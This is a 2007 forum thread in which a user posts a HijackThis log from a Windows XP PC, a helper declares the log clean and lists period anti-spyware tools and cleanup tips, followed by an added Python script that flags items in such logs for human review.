John Posted July 11, 2007 Author ID:6200 Share Posted July 11, 2007 I seem to be finally rid of AVSystemCare & other annoying pop ups! Now I'm down to a performance issue. Some of my user accounts on the PC take excessive time to boot up and individual programs are slow to start. One account freezes my PC when shutting down.Here's my latest HJT log after following your latest suggestion. Rock, thanks for sticking with me on this.Logfile of Trend Micro HijackThis v2.0.0 (BETA)Scan saved at 10:20:04 PM, on 7/10/2007Platform: Windows XP SP2 (WinNT 5.01.2600)Boot mode: NormalRunning processes:C:\WINDOWS\System32\smss.exeC:\WINDOWS\system32\winlogon.exeC:\WINDOWS\system32\services.exeC:\WINDOWS\system32\lsass.exeC:\WINDOWS\system32\svchost.exeC:\WINDOWS\System32\svchost.exeC:\Program Files\Common Files\Symantec Shared\ccSetMgr.exeC:\Program Files\Common Files\Symantec Shared\SNDSrvc.exeC:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exeC:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exeC:\WINDOWS\Explorer.EXEC:\WINDOWS\system32\spoolsv.exeC:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exeC:\WINDOWS\System32\drivers\CDAC11BA.EXEC:\Program Files\CA\SharedComponents\PPRT\bin\ITMRTSVC.exeC:\Program Files\Norton AntiVirus\IWP\NPFMntor.exeC:\WINDOWS\System32\nvsvc32.exeC:\WINDOWS\BCMSMMSG.exeC:\Program Files\Common Files\Symantec Shared\ccApp.exeC:\Program Files\Google\Google Desktop Search\GoogleDesktop.exeC:\Program Files\iTunes\iTunesHelper.exeC:\Program Files\CA\CA Internet Security Suite\cctray\cctray.exeC:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exeC:\WINDOWS\system32\RUNDLL32.EXEC:\Program Files\DellSupport\DSAgnt.exeC:\Program Files\Google\Google Desktop Search\GoogleDesktopIndex.exeC:\Program Files\OLYMPUS\OLYMPUS Master\Monitor.exeC:\Program Files\Messenger\msmsgs.exeC:\WINDOWS\system32\ctfmon.exeC:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exeC:\Program Files\Digital Line Detect\DLG.exeC:\Program 
Files\CA\eTrust PestPatrol\CAPPActiveProtection.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktopCrawl.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files\CA\CA Internet Security Suite\ccprovsp.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Microsoft Money\System\urlmap.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\internet explorer\iexplore.exe
C:\Documents and Settings\Dad\Desktop\HiJackThis_v2.exe

R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
O1 - Hosts: 64.124.166.37 klite.com
O1 - Hosts: 64.124.166.37 www.klite.com
O1 - Hosts: 64.124.166.37 k-lite.com
O1 - Hosts: 64.124.166.37 kazaalite.com
O1 - Hosts: 64.124.166.37 www.kazzalite.com
O1 - Hosts: 64.124.166.37 kazalite.com
O1 - Hosts: 64.124.166.37 www.kazalite.com
O1 - Hosts: 64.124.166.37 kaazalite.com
O1 - Hosts: 64.124.166.37 www.kaazalite.com
O2 - BHO: Yahoo! Toolbar Helper - {02478D38-C3F9-4EFB-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\yt.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar3.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\2.0.301.7164\swg.dll
O2 - BHO: CNavExtBho Class - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O2 - BHO: (no name) - {FDD3B846-8D59-4ffb-8758-209B6AD74ACC} - C:\Program Files\Microsoft Money\System\mnyviewer.dll
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Program Files\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn1\yt.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar3.dll
O4 - HKLM\..\Run: [bCMSMMSG] BCMSMMSG.exe
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [symantec NetDriver Monitor] C:\PROGRA~1\SYMNET~1\SNDMon.exe /Consumer
O4 - HKLM\..\Run: [Google Desktop Search] "C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe" /startup
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [cctray] "C:\Program Files\CA\CA Internet Security Suite\cctray\cctray.exe"
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\system32\NvCpl.dll,NvStartup
O4 - HKCU\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINDOWS\System32\NVMCTRAY.DLL,NvTaskbarInit
O4 - HKCU\..\Run: [DellSupport] "C:\Program Files\DellSupport\DSAgnt.exe" /startup
O4 - HKCU\..\Run: [OM_Monitor] C:\Program Files\OLYMPUS\OLYMPUS Master\Monitor.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
O4 - Global Startup: Digital Line Detect.lnk = ?
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dll
O9 - Extra button: Create Mobile Favorite - {2EAF5BB1-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\inetrepl.dll
O9 - Extra button: (no name) - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\inetrepl.dll
O9 - Extra 'Tools' menuitem: Create Mobile Favorite... - {2EAF5BB2-070F-11D3-9307-00C04FAE2D4F} - C:\PROGRA~1\MICROS~3\inetrepl.dll
O9 - Extra button: Advanced Searchbar - {43F02779-6D88-4958-8AD3-83C12D86ADC7} - (no file)
O9 - Extra 'Tools' menuitem: Advanced Searchbar - {43F02779-6D88-4958-8AD3-83C12D86ADC7} - (no file)
O9 - Extra button: AOL Toolbar - {4982D40A-C53B-4615-B15B-B5B5E98D167C} - C:\WINDOWS\System32\shdocvw.dll
O9 - Extra 'Tools' menuitem: AOL Toolbar - {4982D40A-C53B-4615-B15B-B5B5E98D167C} - C:\WINDOWS\System32\shdocvw.dll
O9 - Extra button: ShopperReports - Compare product prices - {946B3E9E-E21A-49c8-9F63-900533FAFE15} - (no file)
O9 - Extra button: Real.com - {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} - C:\WINDOWS\System32\Shdocvw.dll
O9 - Extra button: MoneySide - {E023F504-0C5A-4750-A1E7-A9046DEA8A21} - C:\Program Files\Microsoft Money\System\mnyviewer.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=39204
O16 - DPF: {7584C670-2274-4EFB-B00B-D6AABA6D3850} (Microsoft RDP Client Control (redist)) - https://mypc.genxsp.net/msrdp.cab
O16 - DPF: {79D6214F-CFCE-480F-9901-27950E78F1E6} (WebCacheCleaner Class) - https://mypc.genxsp.net/MLWebCacheCleaner.cab
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://acs.pandasoftware.com/activescan/as5free/asinst.cab
O20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~1\GOEC62~1.DLL
O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\System32\browseui.dll
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\System32\browseui.dll
O23 - Service: Automatic LiveUpdate Scheduler - Symantec Corporation - C:\Program Files\Symantec\LiveUpdate\ALUSchedulerSvc.exe
O23 - Service: C-DillaCdaC11BA - Macrovision - C:\WINDOWS\System32\drivers\CDAC11BA.EXE
O23 - Service: CaCCProvSP - Unknown owner - C:\Program Files\CA\CA Internet Security Suite\ccprovsp.exe
O23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
O23 - Service: Symantec Password Validation (ccPwdSvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccPwdSvc.exe
O23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
O23 - Service: DSBrokerService - Unknown owner - C:\Program Files\DellSupport\brkrsvc.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: iPod Service - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: CA Pest Patrol Realtime Protection Service (ITMRTSVC) - CA, Inc. - C:\Program Files\CA\SharedComponents\PPRT\bin\ITMRTSVC.exe
O23 - Service: LiveUpdate - Symantec Corporation - C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXE
O23 - Service: Norton AntiVirus Auto-Protect Service (navapsvc) - Symantec Corporation - C:\Program Files\Norton AntiVirus\navapsvc.exe
O23 - Service: Intel® NMS (NMSSvc) - Intel Corporation - C:\WINDOWS\System32\NMSSvc.exe
O23 - Service: Norton AntiVirus Firewall Monitor Service (NPFMntor) - Symantec Corporation - C:\Program Files\Norton AntiVirus\IWP\NPFMntor.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exe
O23 - Service: PPCtlPriv - CA, Inc. - C:\Program Files\CA\eTrust PestPatrol\PPCtlPriv.exe
O23 - Service: SAVScan - Symantec Corporation - C:\Program Files\Norton AntiVirus\SAVScan.exe
O23 - Service: ScriptBlocking Service (SBService) - Symantec Corporation - C:\PROGRA~1\COMMON~1\SYMANT~1\SCRIPT~1\SBServ.exe
O23 - Service: Symantec Network Drivers Service (SNDSrvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
O23 - Service: Symantec SPBBCSvc (SPBBCSvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exe
O23 - Service: Symantec Core LC - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\CCPD-LC\symlcsvc.exe

--End of file - 10688 bytes
therock247uk Posted July 13, 2007 ID:6299

You could try posting about your issues here... http://www.malwarebytes.org/forums/index.p...&s=&f=6 They're not malware issues...

Your log is clean.

Here are some tips. To reduce the potential for spyware infection in the future, I strongly recommend installing the following applications:

Detect and Remove Programs:

How to use Ad-Aware to remove Spyware <= If you suspect that you have spyware installed on your computer, here are instructions on how to download, install and then use Ad-Aware.
How to use Spybot to remove Spyware <= If you suspect that you have spyware installed on your computer, here are instructions on how to download, install and then use Spybot. Similar to Ad-Aware, I strongly recommend both to catch most spyware.

Prevention Programs:

Spywareblaster <= SpywareBlaster will prevent spyware from being installed.
Spywareguard <= SpywareGuard offers realtime protection from spyware installation attempts.
IE/Spyad <= IE/Spyad places over 4000 websites and domains in the IE Restricted list, which will severely impair attempts to infect your system. It basically prevents any downloads (cookies etc.) from the sites listed, although you will still be able to connect to the sites.
MVPS Hosts file <= The MVPS Hosts file replaces your current HOSTS file with one containing well-known ad sites etc. Basically, this prevents your computer from connecting to those sites by redirecting them to 127.0.0.1, which is your local computer.
Google Toolbar <= Get the free Google toolbar to help stop pop-up windows.

I also suggest that you delete any files from "temp" and "tmp" folders. In Internet Explorer, click on "Tools" => "Internet Options" => "Delete Files" and select the box that says "Delete All Offline Content" and click on "OK" twice. Also, empty the recycle bin by right-clicking on it and selecting "Empty Recycle Bin". These steps should be done on a regular basis.

Other necessary Programs:

AntiVirus Program <= An antivirus program is a must! Whether it is a free version like AVG or Anti-Vir, or a shareware version like Norton or Kaspersky, this is a must-have.
Firewall <= A firewall is definitely a must-have. Three good free versions are Kerio, Sygate and ZoneLabs.
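An added example, not part of any post in this thread: a small triage script for logs in the HijackThis format posted above. It separates hosts entries that point a name at a loopback address (the blocking technique described for the MVPS Hosts file) from entries that map a name to a remote address, and lists components marked "(no file)" or "(file missing)". The sample lines are constructed from entries seen in this thread plus one made-up loopback entry, the function names are this example's own, and the output is a review list for a person, not a verdict.

```python
import ipaddress
import re

# Constructed sample: lines in the HijackThis log format seen in this thread,
# plus one made-up loopback entry (ads.example.test).
SAMPLE_LOG = r"""
O1 - Hosts: 64.124.166.37 klite.com
O1 - Hosts: 127.0.0.1 ads.example.test
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dll
O9 - Extra button: Advanced Searchbar - {43F02779-6D88-4958-8AD3-83C12D86ADC7} - (no file)
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - %windir%\Network Diagnostic\xpnetdiag.exe (file missing)
O23 - Service: DSBrokerService - Unknown owner - C:\Program Files\DellSupport\brkrsvc.exe
"""

ENTRY = re.compile(r"^([A-Z]\d{1,2}) - (.*)$")   # section code, then the entry body
HOSTS = re.compile(r"^Hosts:\s+(\S+)\s+(\S+)$")  # address, then host name

def parse(log):
    """Yield (section, body) for each entry line; process paths and headers are skipped."""
    for line in log.splitlines():
        m = ENTRY.match(line.strip())
        if m:
            yield m.group(1), m.group(2)

def is_blocking(ip):
    """True for addresses a blocking hosts file uses (loopback or 0.0.0.0)."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return addr.is_loopback or addr.is_unspecified

def review_items(log):
    """Return (section, reason, body) tuples that a person should look at."""
    items = []
    for section, body in parse(log):
        host = HOSTS.match(body) if section == "O1" else None
        if host and not is_blocking(host.group(1)):
            items.append((section, "hosts entry maps name to a remote address", body))
        elif body.endswith("(no file)") or body.endswith("(file missing)"):
            items.append((section, "registered component has no file on disk", body))
        elif section == "O23" and " - Unknown owner - " in body:
            items.append((section, "service binary shows no company name", body))
    return items

if __name__ == "__main__":
    for section, reason, body in review_items(SAMPLE_LOG):
        print(f"{section:>3}  {reason}: {body}")
```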